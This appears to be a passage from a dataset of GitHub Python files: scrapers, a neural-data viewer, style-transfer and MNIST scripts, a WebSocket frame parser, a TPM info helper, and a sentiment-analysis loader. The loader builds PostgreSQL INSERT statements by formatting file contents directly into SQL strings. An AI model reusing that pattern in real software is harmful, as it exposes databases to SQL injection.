bold\",bg=\"blue4\",fg=\"white\",command=downloader).place(x=380,y=150)\r\nroot.mainloop()\r\n","repo_name":"ShwetaKale1708/Python","sub_path":"Youtube Video Downloader/[Source code]sms.py","file_name":"[Source code]sms.py","file_ext":"py","file_size_in_byte":1546,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"37654384446","text":"#-*- coding: UTF-8 -*-\nimport sys\nimport re\nimport json\nimport requests\nfrom urllib.error import HTTPError\nimport urllib.parse\nfrom html.parser import HTMLParser\nimport xbmc\nimport xbmcaddon\nfrom lib.utils import *\n\n__title__ = 'lyricwiki'\n__priority__ = '200'\n__lrc__ = False\n\nLIC_TXT = 'we are not licensed to display the full lyrics for this song at the moment'\n\n\nclass LyricsFetcher:\n def __init__(self, *args, **kwargs):\n self.DEBUG = kwargs['debug']\n self.settings = kwargs['settings']\n self.url = 'http://lyrics.wikia.com/api.php?func=getSong&artist=%s&song=%s&fmt=realjson'\n\n def get_lyrics(self, song):\n log('%s: searching lyrics for %s - %s' % (__title__, song.artist, song.title), debug=self.DEBUG)\n lyrics = Lyrics(settings=self.settings)\n lyrics.song = song\n lyrics.source = __title__\n lyrics.lrc = __lrc__\n try:\n req = requests.get(self.url % (urllib.parse.quote(song.artist), urllib.parse.quote(song.title)), timeout=10)\n response = req.text\n except:\n return None\n data = json.loads(response)\n try:\n self.page = data['url']\n except:\n return None\n if not self.page.endswith('action=edit'):\n log('%s: search url: %s' % (__title__, self.page), debug=self.DEBUG)\n try:\n req = requests.get(self.page, timeout=10)\n response = req.text\n except requests.exceptions.HTTPError as error: # strange... sometimes lyrics are returned with a 404 error\n if error.response.status_code == 404:\n response = error.response.text\n else:\n return None\n except:\n return None\n matchcode = re.search(\"class='lyricbox'>(.*?)', '\\n')\n lyr = re.sub('<[^<]+?>', '', lyricstext)\n if LIC_TXT in lyr:\n return None\n lyrics.lyrics = lyr\n return lyrics\n except:\n return None\n else:\n return None\n","repo_name":"nebulous42069/diggz","sub_path":"nexus/script.cu.lrclyrics/lib/broken-scrapers/lyricwiki/lyricsScraper.py","file_name":"lyricsScraper.py","file_ext":"py","file_size_in_byte":2326,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"48"} +{"seq_id":"29424286407","text":"#%%\nimport numpy as np\nimport pandas as pd\nimport h5py\nimport torch\n\nimport logging\nfrom matplotlib import pyplot as plt\nimport seaborn as sns\nfrom omegaconf import OmegaConf\n\nfrom context_general_bci.contexts import context_registry\nfrom context_general_bci.config import DatasetConfig, DataKey, MetaKey\nfrom context_general_bci.dataset import SpikingDataset\nfrom context_general_bci.tasks import ExperimentalTask\n\nfrom context_general_bci.analyze_utils import prep_plt, wandb_query_latest, load_wandb_run\n\nmode = 'rtt'\nmode = 'pitt'\nif mode == 'rtt':\n ctxs = context_registry.query(task=ExperimentalTask.odoherty_rtt)\nelse:\n ctxs = context_registry.query(task=ExperimentalTask.observation)\n\ncontext = ctxs[0]\n# context = context_registry.query(alias='mc_rtt')\nprint(context)\n# datapath = './data/odoherty_rtt/indy_20160407_02.mat'\n# context = context_registry.query_by_datapath(datapath)\n\nsample_query = 'human_test' # just pull the latest run\n# sample_query = 'pt_parity'\n\nwandb_run = wandb_query_latest(sample_query, exact=False, allow_running=True)[0]\n# 
print(wandb_run)\n_, cfg, _ = load_wandb_run(wandb_run, tag='val_loss')\ndefault_cfg = cfg.dataset\n# default_cfg: DatasetConfig = OmegaConf.create(DatasetConfig())\n# default_cfg.data_keys = [DataKey.spikes]\ndefault_cfg.data_keys = [DataKey.spikes, DataKey.bhvr_vel]\ndefault_cfg.bin_size_ms = 20\n# default_cfg.datasets = [context.alias]\ndefault_cfg.max_arrays = min(max(1, len(context.array)), 2)\n# default_cfg.max_channels = 250\ndataset = SpikingDataset(default_cfg)\ndataset.build_context_index()\ndataset.subset_split()\n\n# import torch\n# lengths = []\n# for t in range(1000):\n# lengths.append(dataset[t][DataKey.spikes].size(0))\n# print(torch.tensor(lengths).max(), torch.tensor(lengths).min())\nprint(len(dataset))\n#%%\n# trial = 0\ntrial = 10\n# trial = 30\n# trial = 10\ntrial_vel = dataset[trial][DataKey.bhvr_vel]\n\n# Show kinematic trace by integrating trial_vel\nprint(trial_vel.shape)\ntrial_pos = trial_vel.cumsum(0)\ntrial_pos = trial_pos - trial_pos[0]\n# # Plot\nfig, ax = plt.subplots(2, 1, sharex=True)\nax[0].plot(trial_vel)\nax[0].set_title('Velocity')\nax[1].plot(trial_pos)\nax[1].set_title('Position')\n\n#%%\n# iterate through trials and print min and max bhvr_vel\nmin_vel = 0\nmax_vel = 0\nfor trial in range(len(dataset)):\n trial_vel = dataset[trial][DataKey.bhvr_vel]\n min_vel = min(min_vel, trial_vel.min())\n max_vel = max(max_vel, trial_vel.max())\nprint(min_vel, max_vel)\n\n#%%\ntrial = 10\ntrial = 26\n\npop_spikes = dataset[trial][DataKey.spikes]\npop_spikes = pop_spikes[..., 0]\n# print diagnostics\n# print(pop_spikes[::2].sum(0))\n# print(pop_spikes[1::2].sum(0))\n# sns.histplot(pop_spikes[::2].sum(0))\n# sns.histplot(pop_spikes[1::2].sum(0) - pop_spikes[0::2].sum(0))\nprint(\n f\"Mean: {pop_spikes.float().mean():.2f}, \\n\"\n f\"Std: {pop_spikes.float().std():.2f}, \\n\"\n f\"Max: {pop_spikes.max():.2f}, \\n\"\n f\"Min: {pop_spikes.min():.2f}, \\n\"\n f\"Shape: {pop_spikes.shape}\"\n)\n\npop_spikes = pop_spikes.flatten(1, 2)\n# pop_spikes = pop_spikes[:, :96]\n# wait... 
250?\n# path_to_old = './data/old_nlb/mc_maze.h5'\n# with h5py.File(path_to_old, 'r') as f:\n# print(f.keys())\n# pop_spikes = f['train_data_heldin']\n# pop_spikes = torch.tensor(pop_spikes)\n# print(pop_spikes.shape)\n# pop_spikes = pop_spikes[trial]\n\nprint(pop_spikes.shape)\n# print(pop_spikes.sum(0) / 0.6)\n# print(pop_spikes.sum(0))\n# Build raster scatter plot of pop_spikes\ndef plot_spikes(spikes, ax=None, vert_space=1):\n\n if ax is None:\n fig, ax = plt.subplots()\n ax = prep_plt(ax)\n sns.despine(ax=ax, left=True, bottom=False)\n spike_t, spike_c = np.where(spikes)\n # prep_plt(axes[_c], big=True)\n time = np.arange(spikes.shape[0])\n ax.scatter(\n time[spike_t], spike_c * vert_space,\n # c=colors,\n marker='|',\n s=10,\n alpha=0.9\n # alpha=0.3\n )\n time_lim = spikes.shape[0] * dataset.cfg.bin_size_ms\n ax.set_xticks(np.linspace(0, spikes.shape[0], 5))\n ax.set_xticklabels(np.linspace(0, time_lim, 5))\n # ax.set_title(\"Benchmark Maze (Sorted)\")\n ax.set_title(context.alias)\n ax.set_xlabel('Time (ms)')\n ax.set_yticks([])\n return ax\nplot_spikes(pop_spikes)\n","repo_name":"joel99/context_general_bci","sub_path":"scripts/proc_data_viewer_kinematics.py","file_name":"proc_data_viewer_kinematics.py","file_ext":"py","file_size_in_byte":4207,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"31560299810","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\n@author: bow\nExtracting Company Ticker Symbols Part 1\nFind the first record in the table and print\n\"\"\"\n\nimport requests\n\nurl = \"http://finance.yahoo.com/quote/AAPL?p=AAPL\"\nwikiURL = \"https://en.wikipedia.org/wiki/List_of_S%26P_500_companies\"\nresponse = requests.get(url)\n\nwikiResponse = requests.get(wikiURL)\n\ndata = {\"Company\":[]}\n\nwikiFirstParse = wikiResponse.text.split(\"0001555280\")[0] #view a portion of the table\nwikiDataTable = wikiFirstParse.split(\"Component Stocks\")[3] #define the top of the dataset, narrow down range\n\nprint(wikiDataTable.split(\"href=\")[5].split('\">')[1].split(\"9->13\nIndicators = {\"Previous Close\":[],\n \"Open\":[],\n \"Bid\":[],\n \"Ask\":[],\n \"DAYS_RANGE-value\":[],\n \"52 Week Range\":[],\n \"Volume\":[],\n \"Avg. 
Volume\":[],\n \"Market Cap\":[],\n \"Beta\":[],\n \"PE Ratio (TTM)\":[],\n \"EPS (TTM)\":[],\n \"Earnings Date\":[],\n \"Dividend & Yield\":[],\n \"Ex-Dividend Date\":[],\n \"1y Target Est\":[]}\nprint(response)\nprint(response.status_code)\n\nhtmlText = response.text\n#exception add print\n#print(htmlText)\nfor indicator in Indicators:\n #exceptin add break\n #break\n print(indicator)\n splitList = htmlText.split(indicator)\n afterFirstSplit = splitList[1].split(\" -->\")[1]\n afterSecondSplit = afterFirstSplit.split(\"\",isFull)\n\n#3取出队列队列中消息的个数\n##quese.qsize 当前消息的个数\nprint(\"当前消息的个数:\",queue.qsize())\n\n##2判断是否已空\n##queue.empty 判断队列是否为空 为空True 不为空 False\nis_Empty = queue.empty()\nprint(\"is_empty----------->\",is_Empty)","repo_name":"jiangfeng123/pygame","sub_path":"LINUX系统/linux实战/7.0/07--队列的判断.py","file_name":"07--队列的判断.py","file_ext":"py","file_size_in_byte":855,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"23923997751","text":"\n\nimport os\nimport torch\nfrom torchvision import transforms\nfrom inference.Inferencer import Inferencer\nfrom models.PasticheModel import PasticheModel\nfrom PIL import Image\nfrom glob import glob\nimport numpy as np\nimport cv2\n\ndef pil2cv(image):\n new_image = np.array(image, dtype=np.uint8)\n if new_image.ndim == 2:\n pass\n elif new_image.shape[2] == 3:\n new_image = cv2.cvtColor(new_image, cv2.COLOR_RGB2BGR)\n elif new_image.shape[2] == 4:\n new_image = cv2.cvtColor(new_image, cv2.COLOR_RGBA2BGRA)\n return new_image\n\n\ndef export_as_video(inference, path_img, content1, content2, path_video, total_frames, CLIP_FPS):\n\n #imgname = \"sample.jpg\"\n #content1, content2 = 0, 3\n #filepath = 'test.mp4'\n #CLIP_FPS = 30.0\n #total_frames = 100\n\n im = Image.open(path_img).convert('RGB')\n w, h = im.size\n codec = cv2.VideoWriter_fourcc(*'mp4v')\n video = cv2.VideoWriter(path_video, codec, CLIP_FPS, (w, h))\n\n for loop in range(total_frames):\n\n #PIL image\n #First Style (0-15)\n #Second Style (0-15)\n #Percentage mixture between the two styles (0.0-1.0)\n img_trans = inference.eval_image(im, content1, content2, loop / float(total_frames))\n\n video.write(pil2cv(img_trans))\n\n video.release()\n\n\ndef main(args):\n\n styles_dir = args.styles_dir\n model_dir=args.model_dir\n image_size = args.imsize\n path_image = args.path_image\n content1 = args.content1\n content2 = args.content2\n video_name = args.path_video\n total_frames = args.total_frames\n CLIP_FPS = 30.0\n loop = 2\n\n device = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n\n #num_styles = 16\n #\n \n style_images_dir = glob(os.path.join(styles_dir, '*.jpg'))\n num_styles = len(style_images_dir)\n\n model_save_dir = model_dir + \"/pastichemodel_\"+str(loop)+\"-FINAL.pth\"\n pastichemodel = PasticheModel(num_styles)\n inference = Inferencer(pastichemodel, device, image_size)\n inference.load_model_weights(model_save_dir)\n\n\n export_as_video(inference, path_image, content1, content2, video_name, total_frames, CLIP_FPS)\n\n\n\n\nif __name__ == '__main__':\n\n import argparse\n\n main_arg_parser = argparse.ArgumentParser(description=\"parser for training mutli-style-transfer\")\n \n main_arg_parser.add_argument(\"--styles-dir\", type=str, required=True,\n help=\"path to folder containing style images\")\n \n main_arg_parser.add_argument(\"--model-dir\", type=str, default=None,\n help=\"directory to save the model in\")\n\n main_arg_parser.add_argument(\"--imsize\", type=int, default=512,\n help=\"\")\n\n 
main_arg_parser.add_argument(\"--content1\", type=int, default=0,\n help=\"\")\n main_arg_parser.add_argument(\"--content2\", type=int, default=1,\n help=\"\")\n\n main_arg_parser.add_argument(\"--path_video\", type=str, default='result/test.mp4',\n help=\"\")\n main_arg_parser.add_argument(\"--path_image\", type=str, default='dataset/images/trump.jpg',\n help=\"\")\n main_arg_parser.add_argument(\"--total_frames\", type=int, default=1,\n help=\"\")\n\n args = main_arg_parser.parse_args()\n\n main(args)\n \n\n\n ","repo_name":"kevin-tofu/Real-time-multi-style-transfer","sub_path":"transition.py","file_name":"transition.py","file_ext":"py","file_size_in_byte":3385,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"33328603452","text":"import logging\nimport os\n\nimport numpy\nimport tensorflow as tf\nfrom PIL.Image import Image\nfrom tensorflow import keras\n\n# Model / data parameters\nnum_classes = 10\ninput_shape = (28, 28, 1)\n\n\n# Define a simple sequential model\ndef create_model():\n model = tf.keras.Sequential([\n keras.Input(shape=input_shape),\n tf.keras.layers.Conv2D(32, kernel_size=(3, 3), activation=\"relu\"),\n tf.keras.layers.MaxPooling2D(pool_size=(2, 2)),\n tf.keras.layers.Conv2D(64, kernel_size=(3, 3), activation=\"relu\"),\n tf.keras.layers.MaxPooling2D(pool_size=(2, 2)),\n tf.keras.layers.Flatten(),\n tf.keras.layers.Dropout(0.2),\n tf.keras.layers.Dense(10,\n activation=tf.nn.softmax,\n kernel_constraint=tf.keras.constraints.MinMaxNorm(\n min_value=0.0, max_value=1.0, rate=1.0, axis=0\n )\n ),\n ])\n\n model.compile(\n loss=\"categorical_crossentropy\",\n optimizer=\"adam\",\n metrics=[\"accuracy\"]\n )\n model.summary()\n\n return model\n\n\ndef predict(model, image: Image):\n # Change to grayscale\n image = image.convert('L')\n # Change to size supported by the MNIST\n image = image.resize((input_shape[0], input_shape[1]))\n image_array = numpy.array(image).reshape(input_shape)\n image_array = tf.expand_dims(image_array, 0)\n\n predictions = model.predict(image_array)\n logging.debug(predictions)\n return predictions\n","repo_name":"wangyingwwyy/Privacy-Preserving-Federated-Learning-I","sub_path":"PySEAL_Agg_Demo-master/PySEAL_Agg_Demo-master/server/model/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1543,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"35110583185","text":"# Imports\r\nimport os\r\nfrom difflib import SequenceMatcher\r\n\r\nimport pandas as pd\r\nfrom whoswho import who\r\n\r\n# File directories and file names\r\ndir1 = os.path.join('C:',os.sep,'Users', 'pietr', 'Desktop', 'Esther and Pietro', 'Chinese Firewall project', '')\r\nprint(dir1)\r\nfile_master = 'all_authors_list_top50.csv'\r\n\r\ndir2 = os.path.join('C:',os.sep,'Users', 'pietr', 'Desktop', 'Esther and Pietro', 'Chinese Firewall project', 'Output', '')\r\nfile_new = 'authorsonly.csv'\r\nprint(dir2)\r\ndir_output = os.path.join('C:',os.sep,'Users', 'pietr', 'Desktop', 'Esther and Pietro', 'Chinese Firewall project', 'Output',\r\n '')\r\nprint(dir_output)\r\nfile_output = 'Output.csv'\r\n\r\n# Load data sets\r\ndf_master = pd.read_csv(dir1 + file_master)\r\ndf_master['author_name'] = df_master['author']\r\ndf_master['Source'] = 'Master Dataset'\r\ndel df_master['author']\r\n\r\ndf_new = pd.read_csv(dir2 + file_new)\r\ndf_new['coauthor_name'] = df_new['coauthor']\r\ndf_new['Source'] = 'New Dataset'\r\ndel df_new[\"coauthor\"]\r\n\r\n# Merge 
the two data sets\r\nfile_int = 'author_coauthor.csv'\r\ndf_merged = df_master.join(df_new['coauthor_name'])\r\ndf_merged.to_csv(dir1 + file_int, index=False)\r\n\r\n\r\n# First remove all duplicates that are identical matches\r\n# df_merged.drop_duplicates(subset='Name', keep=\"first\", inplace=True)\r\ndf_merged.reset_index(drop=True, inplace=True)\r\n\r\n#Create a subsample of 300 observations of df_merged\r\ndf_merged_sample = df_merged.sample(n=300,replace=False)\r\ndf_merged_sample.to_csv(dir_output + file_output, index=False)\r\nprint(df_merged_sample.head(10))\r\n\r\n\r\n\r\n\r\n","repo_name":"PAletti00/Fuzzy-Merge_Chinese-Firewall","sub_path":"Sample.py","file_name":"Sample.py","file_ext":"py","file_size_in_byte":1580,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"30195622462","text":"'''\r\nFaça um programa que leia o nome e peso de várias pessoas,\r\nguardando tudo em uma lista. No final, mostre:\r\nA) quantas pessoas foram cadastradas\r\nB) uma listagem com as pessoas mais pesadas\r\nC) uma listagem com as pessoas mais leves\r\n'''\r\nprint('=' * 50)\r\nprint((' ' * 10), 'Programa \\033[1;4mDESAFIO84\\033[m iniciado.')\r\nprint('=' * 50)\r\n\r\nlista_tudo = list()\r\nlista_pesadas = list()\r\nlista_leves = list()\r\ncont = 0\r\nresposta = 'S'\r\nwhile resposta == 'S':\r\n lista_tudo.append(str(input('Nome: ')))\r\n lista_tudo.append(float(input('Peso: ')))\r\n if cont == 0:\r\n lista_pesadas.append(lista_tudo[0])\r\n lista_pesadas.append(lista_tudo[1])\r\n lista_leves.append(lista_tudo[0])\r\n lista_leves.append(lista_tudo[1])\r\n lista_tudo.clear()\r\n else:\r\n if lista_tudo[1] == lista_pesadas[1]:\r\n lista_pesadas.append(lista_tudo[0])\r\n lista_pesadas.append(lista_tudo[1])\r\n lista_tudo.clear()\r\n elif lista_tudo[1] > lista_pesadas[1]:\r\n lista_pesadas.clear()\r\n lista_pesadas.append(lista_tudo[0])\r\n lista_pesadas.append(lista_tudo[1])\r\n lista_tudo.clear()\r\n elif lista_tudo[1] == lista_leves[1]:\r\n lista_leves.append(lista_tudo[0])\r\n lista_leves.append(lista_tudo[1])\r\n lista_tudo.clear()\r\n elif lista_tudo[1] < lista_leves[1]:\r\n lista_leves.clear()\r\n lista_leves.append(lista_tudo[0])\r\n lista_leves.append(lista_tudo[1])\r\n lista_tudo.clear()\r\n cont += 1\r\n resposta = str(input('Deseja continuar [S/N]:\\n')).upper()\r\n\r\nprint('_' * 50)\r\nprint(f'Quantidade de pessoas cadastradas: \\033[33m{cont}\\033[m')\r\nprint(f'Lista das pessoas mais pesadas: \\033[31m{lista_pesadas}\\033[m')\r\nprint(f'Lista das pessoas mais leves: \\033[32m{lista_leves}\\033[m')\r\n\r\nprint('=' * 50)\r\nprint('Fim do programa.')","repo_name":"alex-gsantos/cursos_em_video","sub_path":"desafio84.py","file_name":"desafio84.py","file_ext":"py","file_size_in_byte":1910,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"41299667941","text":"from bitstring import BitArray\nfrom typing import ByteString\nfrom .base import Header\n\n\"\"\"\nFrame format: \n​​\n 0 1 2 3\n 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1\n +-+-+-+-+-------+-+-------------+-------------------------------+\n |F|R|R|R| opcode|M| Payload len | Extended payload length |\n |I|S|S|S| (4) |A| (7) | (16/64) |\n |N|V|V|V| |S| | (if payload len==126/127) |\n | |1|2|3| |K| | |\n +-+-+-+-+-------+-+-------------+ - - - - - - - - - - - - - - - +\n | Extended payload length continued, if payload len == 127 |\n + - - - - - - - - - - - - - - - +-------------------------------+\n 
| |Masking-key, if MASK set to 1 |\n +-------------------------------+-------------------------------+\n | Masking-key (continued) | Payload Data |\n +-------------------------------- - - - - - - - - - - - - - - - +\n : Payload Data continued ... :\n + - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - +\n | Payload Data continued ... |\n +---------------------------------------------------------------+\n\"\"\"\n\nclass OpCode:\n\n TEXT = 0x1\n BINARY = 0x2\n CLOSE = 0x8\n PING = 0x9\n PONG = 0xa\n\nclass WebSocket(Header):\n\n def __init__(self, header: ByteString = None) -> None:\n super().__init__(header)\n self.HEADERS = {\n \"FIN\": 1,\n \"RSV1\": 1,\n \"RSV2\": 1,\n \"RSV3\": 1,\n \"OpCode\": 4,\n \"Mask\": 1,\n \"PL_len\": 7,\n \"Extended payload length\": None,\n \"Mask-Key\": 32,\n \"Payload data\": None \n }\n\n def create(self, msg: str, opcode: OpCode = OpCode.TEXT, fin: bool = True):\n length = len(msg)\n msg = msg.encode('utf-8')\n payload_len = 0\n extend_len = 0\n\n if length > 0xffffffffffffffff:\n raise BufferError(\"Msg too long\")\n elif length > 0xffff:\n payload_len = 127\n extend_len = length\n elif length > (0xff >> 1) - 2:\n payload_len = 126\n extend_len = length\n else:\n payload_len = length\n \n payload = bytes([(fin << 7) + opcode])\n payload += payload_len.to_bytes(1, byteorder='big')\n if extend_len == 0:\n payload += msg\n elif payload_len == 126:\n payload += extend_len.to_bytes(2, byteorder='big') + msg\n elif payload_len == 127:\n payload += extend_len.to_bytes(8, byteorder='big') + msg\n else:\n raise SystemError(\"payload_len is not correctlly set\")\n\n self.HEADER = payload\n\n def _parser(self) -> None:\n\n TEMP_HEADER = {}\n header_index = 0\n \n for header in self.HEADERS:\n\n header_len = self.HEADERS[header]\n\n if header == \"Extended payload length\":\n\n if TEMP_HEADER[\"PL_len\"] == 126:\n header_len = 16\n elif TEMP_HEADER[\"PL_len\"] == 127:\n header_len = 64\n else:\n header_len = 0\n\n if header == \"Mask-Key\":\n\n header_len = self.HEADERS[header] if TEMP_HEADER[\"Mask\"] == 1 else 0\n\n if header == \"Payload data\":\n\n header_len = TEMP_HEADER[\"PL_len\"] if TEMP_HEADER[\"Extended payload length\"] == None else TEMP_HEADER[\"Extended payload length\"]\n\n target = self.HEADER[header_index // 8 : header_index // 8 + header_len]\n if TEMP_HEADER[\"Mask\"] == 1:\n TEMP_HEADER[\"Mask-Key\"] = list(map(lambda i: TEMP_HEADER[\"Mask-Key\"] >> ((3 - i)*8) & 0xff, range(4)))\n target = list(target)\n for i in range(len(target)):\n target[i] = chr(target[i] ^ TEMP_HEADER[\"Mask-Key\"][i % 4])\n target = ''.join(target).encode('utf-8')\n\n target = target.decode('utf-8')\n\n else:\n target = self.get_data(self.HEADER, header_index, header_len)\n header_index += header_len\n \n TEMP_HEADER.update({header: target})\n\n self.HEADER = TEMP_HEADER\n return TEMP_HEADER\n\n def get_data(self, header, index, len):\n\n res = BitArray(bytes=header, length=len, offset=index)\n\n if not len == 0:\n return int(res.bin, 2)\n else:\n return None\n\n def raw(self) -> ByteString:\n return self.HEADER\n","repo_name":"N0Ball/NCU_Socket","sub_path":"app/modules/header/websocket_headers.py","file_name":"websocket_headers.py","file_ext":"py","file_size_in_byte":4739,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"17787991939","text":"from collections import defaultdict\n\n\nclass Traversable:\n \"\"\"Attributes are traversable recursively.\"\"\"\n\n def __init__(self, data):\n self.data = 
data\n\n def __str__(self):\n return str(self.data)\n\n def attrs_recursive(self, parent=\"\"):\n \"\"\"Return a generator to all attributes.\"\"\"\n attrs_rec = []\n sep = \".\" if parent else \"\"\n\n for attr in dir(self):\n attr = attr.replace(\"-\", \"_\")\n child = getattr(self, attr)\n if isinstance(child, Traversable):\n attrs_rec.extend(child.attrs_recursive(parent=f\"{parent}{sep}{attr}\"))\n else:\n attrs_rec.append(f\"{parent}{sep}{attr}\")\n\n yield from attrs_rec\n\n\nclass BasicDict(Traversable):\n \"\"\"Takes a dict and makes values accessible via dot notation.\"\"\"\n\n def __getattr__(self, attr):\n return self.data[attr]\n\n def __dir__(self):\n return self.data.keys()\n\n\nclass NamedKVPList(Traversable):\n \"\"\"\n Takes a list of KVPs where both key and value are named (i.e. KVPs itself),\n e.g.\n [\n {\n \"property\": \"VENDOR_TPM_TYPE\",\n \"value\": 1\n },\n {\n \"property\": \"FIRMWARE_VERSION_1\",\n \"value\": 538513443\n }\n ]\n Makes the values accessible via dot notation. If a value_class is given, an\n instance of that class is returned (passing the value to __init__()).\n \"\"\"\n\n def __init__(self, data, key_name, value_name, value_class=None):\n super().__init__(data)\n self.key_name = key_name\n self.value_name = value_name\n self.value_class = value_class\n\n def __getattr__(self, attr):\n value = next(\n item[self.value_name]\n for item in self.data\n if item[self.key_name].lower() == attr.lower()\n )\n\n if self.value_class:\n return self.value_class(value)\n\n return value\n\n def __dir__(self):\n return [item[self.key_name].lower() for item in self.data]\n\n\nclass Capabilities(Traversable):\n \"\"\"Takes a list of capability dicts and makes them accessible via dot notation.\"\"\"\n\n def _get_cap_data(self, description):\n return next(cap for cap in self.data if cap[\"description\"] == description)[\n \"info\"\n ][\"data\"]\n\n def __getattr__(self, attr):\n # some caps are accessed via '_' but their names contain '-'\n attr = attr.replace(\"_\", \"-\")\n cap_data = self._get_cap_data(attr)\n\n cap = defaultdict(\n lambda: cap_data,\n {\n \"algorithms\": NamedKVPList(\n cap_data, \"alg\", \"algProperties\", value_class=globals()[\"BasicDict\"]\n ),\n \"properties-fixed\": NamedKVPList(cap_data, \"property\", \"value\"),\n \"properties-variable\": NamedKVPList(cap_data, \"property\", \"value\"),\n \"commands\": None, # TODO by command index?\n \"pcrs\": NamedKVPList(cap_data, \"hash\", \"pcrSelect\"),\n \"pcr-properties\": NamedKVPList(cap_data, \"tag\", \"pcrSelect\"),\n },\n )[attr]\n\n return cap\n\n def __dir__(self):\n return [item[\"description\"] for item in self.data]\n\n\ndef str_from_int_list(int_list):\n \"\"\"Cast integers to bytes and decode as string.\"\"\"\n string = b\"\".join(\n integer.to_bytes(4, byteorder=\"big\") for integer in int_list\n ).decode(\"utf-8\")\n # remove leading or trailing whitespaces\n string = string.strip()\n # remove null bytes\n string = string.replace(\"\\x00\", \"\")\n # replace multiple whitespaces with a single one\n string = \" \".join(string.split())\n\n return string\n\n\nclass FapiInfo(Traversable):\n \"\"\"Takes a FAPI info dict and and makes its values accessible via dot notation.\"\"\"\n\n def __getattr__(self, attr):\n item_data = self.data[attr]\n\n return defaultdict(\n lambda: item_data,\n {\n \"fapi_config\": BasicDict(item_data),\n \"capabilities\": Capabilities(item_data),\n },\n )[attr]\n\n @property\n def vendor_string(self):\n \"\"\"Get the TPM Vendor String.\"\"\"\n return 
str_from_int_list(\n [\n self.capabilities.properties_fixed.vendor_string_1,\n self.capabilities.properties_fixed.vendor_string_2,\n self.capabilities.properties_fixed.vendor_string_3,\n self.capabilities.properties_fixed.vendor_string_4,\n ]\n )\n\n @property\n def manufacturer(self):\n \"\"\"Get the TPM Manufacturer.\"\"\"\n return str_from_int_list([self.capabilities.properties_fixed.manufacturer])\n\n @property\n def firmware_version(self):\n \"\"\"Get the TPM Firmware Version (formatted according to vendor conventions).\"\"\"\n key = f\"{self.manufacturer}.{self.vendor_string}\"\n ver1 = self.capabilities.properties_fixed.firmware_version_1\n ver2 = self.capabilities.properties_fixed.firmware_version_2\n\n return defaultdict(\n lambda: f\"{ver1:x}.{ver2:x}\", {\"IBM.SW TPM\": f\"{ver1:x}.{ver2:x}\"}\n )[key]\n\n @property\n def spec_revision(self):\n \"\"\"Get the TPM Specification Revision.\"\"\"\n rev = self.capabilities.properties_fixed.ps_revision\n # Add '.' after first digit\n rev = f\"{rev // 100}.{rev % 100}\"\n\n return rev\n\n def __dir__(self):\n return self.data.keys()\n","repo_name":"tpm2-software/tpm2-pytss","sub_path":"src/tpm2_pytss/fapi_info.py","file_name":"fapi_info.py","file_ext":"py","file_size_in_byte":5440,"program_lang":"python","lang":"en","doc_type":"code","stars":46,"dataset":"github-code","pt":"48"} +{"seq_id":"39959803211","text":"import psycopg2 as postgres\nimport csv as csv\nfrom vaderSentiment.vaderSentiment import SentimentIntensityAnalyzer\nsentimentAnalyzer = SentimentIntensityAnalyzer()\n# create connection to the database\ndatabaseConnection = postgres.connect(host=\"localhost\", dbname=\"DataAnalytics\", user=\"postgres\", password=\"1\")\n# create a cursor to execute commands\ndatabaseCursor = databaseConnection.cursor()\n\nnameFile = open(\"./allCleanedFiles.txt\", \"r\", encoding=\"utf8\")\nlines = nameFile.read().splitlines()\n\ndef sentiment_analyzer_scores(sentence):\n score = sentimentAnalyzer.polarity_scores(sentence)\n #print(\"{:-<40} {}\".format(sentence, str(score)))\n #print(type(score))\n return score\n\n# build a correctly formatted string\ndef build_tuple_string(arrayOfStrings):\n insertString = \"'\" + str(arrayOfStrings[0]) +\"'\"\n for i in range(1, len(arrayOfStrings)):\n string = str(arrayOfStrings[i])\n #this is done to prevent an sql error because one value is no available for some reason\n if string == '':\n string = str(-1)\n insertString += \", '\" + string + \"' \"\n return insertString\n\n\ndef insert_tuple_into_database(tuple):\n databaseCursor.execute(\n \"\"\"INSERT INTO Posts (Id, ParentId, CreationDate, Score, Body, OwnerUserId, LastEditorUserID, LastEditDate, CommentCount, positiveavg, negativeavg, neutralavg, compundavg, positiveall, negativeall, neutralall, compoundall, community) VALUES ({})\"\"\".format(tuple))\n\n#if no editor is in the tuple, we simply omit the insert of the editor and date\ndef insert_tuple_into_database_without_editor(tuple):\n databaseCursor.execute(\n \"\"\"INSERT INTO Posts (Id, ParentId, CreationDate, Score, Body, OwnerUserId, CommentCount, positiveavg, negativeavg, neutralavg, compundavg, positiveall, negativeall, neutralall, compoundall, community) VALUES ({})\"\"\".format(tuple))\n\n\n\n\n\nfor lineFile in lines:\n print(\"Opening file: \" + lineFile)\n file = open(\"./CleanedFiles/\"+lineFile, encoding=\"utf8\", mode=\"r\")\n reader = csv.reader(file, delimiter=',')\n communityValue = -1\n if lineFile[0] == \"C\":\n #c answer\n communityValue = 0\n else:\n # python answers\n 
